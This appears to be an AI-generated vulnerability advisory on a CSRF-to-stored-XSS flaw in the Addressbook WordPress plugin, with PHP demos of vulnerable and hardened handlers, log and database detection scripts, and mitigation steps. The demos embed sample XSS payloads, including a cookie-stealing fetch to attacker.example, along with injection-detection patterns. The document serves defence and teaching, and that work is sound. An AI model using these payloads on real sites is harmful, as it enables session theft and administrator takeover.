CVE-2024-51644 Overview
CVE-2024-51644 is a Cross-Site Request Forgery (CSRF) vulnerability [CWE-352] in the samwilson Addressbook WordPress plugin. The flaw affects all versions of Addressbook up to and including 1.1.3. An attacker can chain the CSRF weakness into a Stored Cross-Site Scripting (XSS) attack against authenticated administrators. Successful exploitation requires user interaction, such as enticing a logged-in administrator to visit an attacker-controlled page. The injected script persists in the application and executes in the browser of any user who later views the affected page.
Critical Impact
An unauthenticated attacker can trick an authenticated WordPress administrator into submitting a forged request that stores malicious JavaScript. Because the stored payload later runs in the administrator's browser with that user's privileges, it can issue any request the administrator could (create users, change settings, install plugins) and can therefore lead to session compromise and administrative account takeover.
Affected Products
- samwilson Addressbook WordPress plugin
- All versions through 1.1.3
- WordPress sites running the vulnerable plugin
Discovery Timeline
- 2024-11-19 - CVE-2024-51644 published to NVD
- 2026-04-23 - Last updated in NVD database
Technical Details for CVE-2024-51644
Vulnerability Analysis
The Addressbook plugin fails to validate the origin of state-changing HTTP requests. WordPress provides a nonce-based anti-CSRF mechanism (wp_nonce_field() on the form, check_admin_referer() or wp_verify_nonce() in the handler), but the affected plugin endpoints do not enforce these checks. This omission allows attackers to craft malicious HTML or JavaScript that submits requests on behalf of an authenticated administrator; the browser attaches the administrator's session cookies to the forged request automatically. Because the same request handlers also accept attacker-controlled input that is later rendered without proper output encoding, the CSRF becomes a vehicle for persistent script injection. The stored payload executes whenever an administrator or other user views the affected address book entry. A nonce check only proves that the request came from a form the site rendered for that user; it does not replace a capability check such as current_user_can(), which the handler still needs.
Root Cause
The root cause is the absence of CSRF token validation on plugin form submissions, combined with insufficient sanitization and output encoding of stored data. Either control on its own would break this particular chain: a nonce check stops the forged write, and output encoding stops the stored markup from executing. Both belong in the fix, because each covers what the other does not: nonce validation does nothing against a malicious user who is legitimately logged in, and output encoding does nothing against a forged state change that needs no script. The single CWE assigned is [CWE-352] (Cross-Site Request Forgery), reflecting the initial attack primitive.
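To make the two defects and their fixes concrete, here is an added PHP example. It is not code from the Addressbook plugin or from WordPress core: it models a WordPress-style form handler twice, once with the two defects described above (no nonce check, no output encoding) and once hardened, and it reimplements the WordPress nonce scheme in a stand-alone form so the file runs with plain `php`. NONCE_SECRET, the action name addressbook_save, the field names and the sample requests are assumptions for the demonstration.

```php
<?php
// Added example, not code from the Addressbook plugin or WordPress core. It models a
// WordPress-style form handler twice: with the two defects the advisory describes
// (no nonce check, no output encoding) and hardened. The nonce scheme mirrors
// wp_create_nonce()/wp_verify_nonce(): an HMAC over "tick|action|user|session-token",
// truncated to 10 hex chars, accepted for the current and previous 12-hour tick.
// NONCE_SECRET, the action name 'addressbook_save' and the field names are assumptions.
declare(strict_types=1);

const NONCE_SECRET = 'stand-in-for-NONCE_KEY-and-NONCE_SALT'; // wp_salt('nonce') in WordPress

function nonce_tick(int $now): int
{
    return (int) ceil($now / (12 * 3600)); // wp_nonce_tick(): nonce_life / 2
}

function create_nonce(string $action, int $userId, string $token, int $now): string
{
    return substr(hash_hmac('md5', nonce_tick($now) . "|$action|$userId|$token", NONCE_SECRET), -12, 10);
}

function verify_nonce(?string $nonce, string $action, int $userId, string $token, int $now): bool
{
    if ($nonce === null || $nonce === '') {
        return false;
    }
    $tick = nonce_tick($now);
    foreach ([$tick, $tick - 1] as $t) {
        $expected = substr(hash_hmac('md5', "$t|$action|$userId|$token", NONCE_SECRET), -12, 10);
        if (hash_equals($expected, $nonce)) {
            return true;
        }
    }
    return false;
}

// --- vulnerable shape: any POST carrying the admin's cookies is stored raw and echoed raw ---
function vulnerable_save(array $post, array &$rows): void
{
    $rows[] = ['name' => $post['name'] ?? '', 'email' => $post['email'] ?? ''];
}

function vulnerable_render(array $rows): string
{
    $html = '';
    foreach ($rows as $r) {
        $html .= "<tr><td>{$r['name']}</td><td>{$r['email']}</td></tr>\n";
    }
    return $html;
}

// --- hardened shape: check_admin_referer() + sanitize_text_field() + esc_html() equivalents ---
function sanitize_text(string $v): string
{
    $v = preg_replace('/[\x00-\x1F\x7F]/', '', strip_tags($v)); // strip tags and control chars
    return trim(preg_replace('/\s+/', ' ', $v));                // collapse whitespace
}

function escape_html(string $v): string
{
    return htmlspecialchars($v, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function hardened_save(array $post, array &$rows, int $userId, string $token, int $now): bool
{
    // check_admin_referer('addressbook_save') would wp_die() here. A real handler also needs
    // current_user_can('manage_options'): a nonce proves intent, not authorization.
    if (!verify_nonce($post['_wpnonce'] ?? null, 'addressbook_save', $userId, $token, $now)) {
        return false;
    }
    $email = filter_var($post['email'] ?? '', FILTER_VALIDATE_EMAIL);
    $rows[] = ['name' => sanitize_text($post['name'] ?? ''), 'email' => $email === false ? '' : $email];
    return true;
}

function hardened_render(array $rows): string
{
    $html = '';
    foreach ($rows as $r) {
        $html .= '<tr><td>' . escape_html($r['name']) . '</td><td>' . escape_html($r['email']) . "</td></tr>\n";
    }
    return $html;
}

// --- demo with constructed requests ---
$now = 1700000000; $admin = 1; $token = 'victim-session-token';
$forged = ['name' => '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
           'email' => 'x@example.com']; // a cross-site form post: cookies come along, a nonce does not

$rows = [];
vulnerable_save($forged, $rows);
echo "vulnerable:\n", vulnerable_render($rows); // onerror handler is emitted verbatim

$rows = [];
var_dump(hardened_save($forged, $rows, $admin, $token, $now)); // bool(false): no nonce
$foreign = create_nonce('addressbook_save', $admin, 'attacker-session-token', $now);
var_dump(hardened_save($forged + ['_wpnonce' => $foreign], $rows, $admin, $token, $now)); // bool(false)
$legit = ['name' => "O'Brien & Sons", 'email' => 'ob@example.org',
          '_wpnonce' => create_nonce('addressbook_save', $admin, $token, $now)]; // as wp_nonce_field() emits
var_dump(hardened_save($legit, $rows, $admin, $token, $now)); // bool(true)
echo "hardened:\n", hardened_render($rows); // O&apos;Brien &amp; Sons
```

The second rejected request shows why the nonce works as an anti-CSRF token: it is bound to the victim's session token and site salts, so a value the attacker computes (or harvests from their own session) never matches, and the attacker's origin cannot read the real value out of the admin page. In a real plugin the stand-in functions map directly onto check_admin_referer(), sanitize_text_field(), sanitize_email() and esc_html().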
Attack Vector
The attack is network-reachable and requires the targeted administrator to interact with attacker-controlled content. A typical exploitation flow involves the attacker hosting a page containing a hidden auto-submitting form or a credentialed no-cors fetch request that targets the plugin's administrative endpoint. When an authenticated administrator visits the page, the browser automatically sends valid session cookies with the forged request. The plugin processes the request and stores the attacker's JavaScript payload. The payload executes in the context of the WordPress admin session on subsequent page views. One caveat: Chromium-based browsers treat cookies without a SameSite attribute as Lax and withhold them on cross-site POST requests, while Firefox and Safari do not enforce that default, and Lax does not protect an endpoint that accepts the state change via GET.
No verified public exploit code is available. See the Patchstack WordPress Vulnerability Report for additional technical context.
Detection Methods for CVE-2024-51644
Indicators of Compromise
- Unexpected <script>, onerror, or onload strings present in Addressbook plugin database tables or entries.
- WordPress admin sessions exhibiting outbound requests to unknown external domains after viewing address book pages.
- New or modified administrator accounts created shortly after an administrator accessed the address book interface.
- Referer headers in web server logs showing administrators arriving at plugin endpoints from external, untrusted origins.
Detection Strategies
- Review WordPress database tables associated with the Addressbook plugin for HTML or JavaScript content in fields intended to hold plain text.
- Inspect web server access logs for POST requests to plugin endpoints that arrive with a missing or external Referer header. Standard access-log formats do not record POST bodies, so the absence of a valid _wpnonce field is only visible where request bodies are logged (for example by a WAF) or in the application's own rejection handling.
- Deploy a web application firewall (WAF) rule set that flags submissions to WordPress admin endpoints originating from cross-origin contexts.
- Use file integrity monitoring on the wp-content/plugins/addressbook/ directory to detect tampering.
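As an added example for the log-review strategy above (not part of the advisory or the plugin), the following PHP reviews combined-format access log lines and reports POSTs to the plugin's admin endpoint whose Referer is absent or belongs to another host. The endpoint path (admin-post.php?action=addressbook_save), the site host and the log lines are all constructed assumptions; substitute the real endpoint from the plugin's source.

```php
<?php
// Added example, not part of the advisory or the plugin. Reviews combined-format
// access log lines for POSTs to the plugin's admin endpoint whose Referer is
// absent or belongs to another host. The endpoint path, the site host and the
// log lines are constructed assumptions.
declare(strict_types=1);

const COMBINED_RE = '/^(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+)[^"]*" '
    . '(?<status>\d{3}) \S+ "(?<referer>[^"]*)" "(?<ua>[^"]*)"$/';

function parse_combined(string $line): ?array
{
    return preg_match(COMBINED_RE, $line, $m) === 1 ? $m : null;
}

/**
 * Returns one finding per suspicious request: ['line' => n, 'ip' => .., 'time' => .., 'reason' => ..].
 * $endpointRe matches the path+query of the plugin's state-changing endpoint.
 */
function find_cross_origin_posts(array $lines, string $siteHost, string $endpointRe): array
{
    $findings = [];
    foreach ($lines as $i => $line) {
        $req = parse_combined($line);
        if ($req === null || $req['method'] !== 'POST' || preg_match($endpointRe, $req['path']) !== 1) {
            continue;
        }
        $ref = $req['referer'];
        if ($ref === '-' || $ref === '') {
            // Browsers send Referer on same-site form posts unless a referrer policy suppresses it,
            // so a missing header is a weaker signal than a foreign one: label it for manual review.
            $reason = 'no Referer (verify referrer policy; possible cross-site form post)';
        } else {
            $host = strtolower((string) parse_url($ref, PHP_URL_HOST));
            if ($host === strtolower($siteHost)) {
                continue;
            }
            $reason = "Referer host '$host' is not the site host";
        }
        $findings[] = ['line' => $i + 1, 'ip' => $req['ip'], 'time' => $req['time'], 'reason' => $reason];
    }
    return $findings;
}

// constructed sample: one lure-originated POST, one legitimate POST, one GET, one POST with no Referer
$sample = [
    '203.0.113.7 - - [19/Nov/2024:10:15:01 +0000] "POST /wp-admin/admin-post.php?action=addressbook_save HTTP/1.1" 302 0 "https://evil.example/lure.html" "Mozilla/5.0"',
    '203.0.113.7 - - [19/Nov/2024:10:16:44 +0000] "POST /wp-admin/admin-post.php?action=addressbook_save HTTP/1.1" 302 0 "https://www.example.org/wp-admin/admin.php?page=addressbook" "Mozilla/5.0"',
    '198.51.100.9 - - [19/Nov/2024:10:20:03 +0000] "GET /wp-admin/admin.php?page=addressbook HTTP/1.1" 200 5120 "https://www.example.org/wp-admin/" "Mozilla/5.0"',
    '203.0.113.7 - - [19/Nov/2024:10:21:00 +0000] "POST /wp-admin/admin-post.php?action=addressbook_save HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
];

foreach (find_cross_origin_posts($sample, 'www.example.org', '#^/wp-admin/admin-post\.php\?action=addressbook_#') as $f) {
    printf("line %d  %s  %s  %s\n", $f['line'], $f['time'], $f['ip'], $f['reason']);
}
// flags line 1 (evil.example) and line 4 (no Referer); lines 2 and 3 pass
```

The Origin header is the more reliable signal for cross-site POSTs but is not part of the combined log format; if you can change the log format (Apache `%{Origin}i`, nginx `$http_origin`), log it and compare it the same way. The endpoint pattern deliberately matches every addressbook_ action, since any state-changing handler without a nonce check is of interest.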
Monitoring Recommendations
- Aggregate WordPress audit logs (an activity-log plugin, or custom hooks on the plugin's save action) and alert on address book changes whose originating request carried a missing or external Origin or Referer header; the site itself cannot observe the administrator's visits to other pages, so the request headers are the usable signal.
- Collect CSP violation reports from admin pages at a reporting endpoint (report-to / report-uri) and alert on blocked inline script executions. Browser console errors are visible only to the user at the keyboard and are not a monitoring source on their own.
- Track plugin version inventory across WordPress installations to identify hosts still running Addressbook 1.1.3 or earlier.
How to Mitigate CVE-2024-51644
Immediate Actions Required
- Deactivate the Addressbook plugin on any WordPress site running version 1.1.3 or earlier until a patched release is verified.
- Audit existing address book entries and database records for stored JavaScript payloads and remove malicious content.
- Force password resets and re-authentication for all WordPress administrator accounts that may have been targeted.
- Review user roles and remove unauthorized accounts created during the exposure window.
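For the audit step above (and the matching detection strategy of reviewing plugin tables for markup in plain-text fields), here is an added PHP triage helper. It is not part of the advisory or the plugin: it scans exported rows for script and markup markers, checking both the stored bytes and an entity-decoded copy. The column names and the rows are constructed; load the plugin's real rows (for example via `wp db query` or $wpdb) before running it against a site.

```php
<?php
// Added example, not part of the advisory. Triage helper for the "audit existing
// entries" step: scans exported rows for markup and script markers in fields that
// should hold plain text. The column names and rows are constructed, not the
// plugin's real schema.
declare(strict_types=1);

// Patterns tolerate case, attribute whitespace and tag-name splitting such as <scr\nipt
const INJECTION_PATTERNS = [
    'script tag'      => '/<\s*s\s*c\s*r\s*i\s*p\s*t/i',
    'event handler'   => '/\bon[a-z]+\s*=/i',
    'javascript: URL' => '/javascript\s*:/i',
    'html container'  => '/<\s*(iframe|svg|object|embed|math|img)\b/i',
    'data: URL'       => '/data\s*:\s*text\/html/i',
];

/** Returns [['row' => id, 'field' => name, 'pattern' => label, 'excerpt' => str], ...]. */
function find_stored_payloads(array $rows, array $textFields): array
{
    $hits = [];
    foreach ($rows as $row) {
        foreach ($textFields as $field) {
            $raw = (string) ($row[$field] ?? '');
            // check the stored bytes and an entity-decoded copy: double-encoding is a common evasion,
            // so an encoded hit is still worth a manual look even if the plugin renders it safely
            foreach ([$raw, html_entity_decode($raw, ENT_QUOTES | ENT_HTML5, 'UTF-8')] as $candidate) {
                foreach (INJECTION_PATTERNS as $label => $re) {
                    if (preg_match($re, $candidate, $m, PREG_OFFSET_CAPTURE) === 1) {
                        $hits[] = ['row' => $row['id'], 'field' => $field, 'pattern' => $label,
                                   'excerpt' => substr($candidate, max(0, $m[0][1] - 10), 60)];
                        continue 3; // one finding per field is enough for triage
                    }
                }
            }
        }
    }
    return $hits;
}

$rows = [ // constructed sample rows
    ['id' => 1, 'name' => 'Ada Lovelace', 'email' => 'ada@example.org', 'notes' => 'Met at conf <3'],
    ['id' => 2, 'name' => '<img src=x onerror=alert(document.cookie)>', 'email' => 'x@example.com', 'notes' => ''],
    ['id' => 3, 'name' => 'Bob', 'email' => 'bob@example.org', 'notes' => '&lt;script src=//evil.example/a.js&gt;'],
    ['id' => 4, 'name' => 'Carol', 'email' => 'carol@example.org', 'notes' => 'Follow up on Monday'],
];

foreach (find_stored_payloads($rows, ['name', 'email', 'notes']) as $h) {
    printf("row %d  %-6s %-15s %s\n", $h['row'], $h['field'], $h['pattern'], $h['excerpt']);
}
// flags row 2 (name, event handler) and row 3 (notes, script tag after entity decoding); rows 1 and 4 pass
```

Treat the output as a review list rather than a verdict: a legitimate note can contain a `<3` or the word "on", and the patterns are tuned to catch common payload shapes rather than to parse HTML. Anything flagged should be removed or re-entered as plain text, and the corresponding admin sessions treated as suspect.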
Patch Information
No fixed version is identified in the NVD record at the time of publication. The advisory states the issue affects Addressbook through <= 1.1.3. Consult the Patchstack WordPress Vulnerability Report for the latest remediation guidance and replace the plugin if no maintained update is released.
Workarounds
- Remove or replace the Addressbook plugin with an actively maintained alternative that enforces WordPress nonce validation.
- Enforce a Content Security Policy on the WordPress admin interface that disallows inline scripts, to limit XSS payload execution. Caveat: wp-admin and many plugins rely heavily on inline scripts, so an enforcing policy needs nonces or hashes for the legitimate ones and extensive testing; start with Content-Security-Policy-Report-Only and review the reports before enforcing.
- Require administrators to use separate browsers or browser profiles for WordPress administration to reduce cross-site request exposure.
- Deploy a WAF rule that blocks POST requests to the plugin's endpoints whose Origin or Referer header is missing or names another site. A WAF can require a _wpnonce field to be present in the body, but it cannot validate it: the value is bound to the user's session token and the site's salts, so validation stays with WordPress.
# Configuration example: disable the vulnerable plugin via WP-CLI
wp plugin list --fields=name,version,status   # confirm the installed slug and version first
wp plugin deactivate addressbook              # slug assumed to be "addressbook"; use the name shown above
wp plugin delete addressbook
wp user session destroy <admin-login> --all   # invalidate the administrator's existing sessions (see Immediate Actions)
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


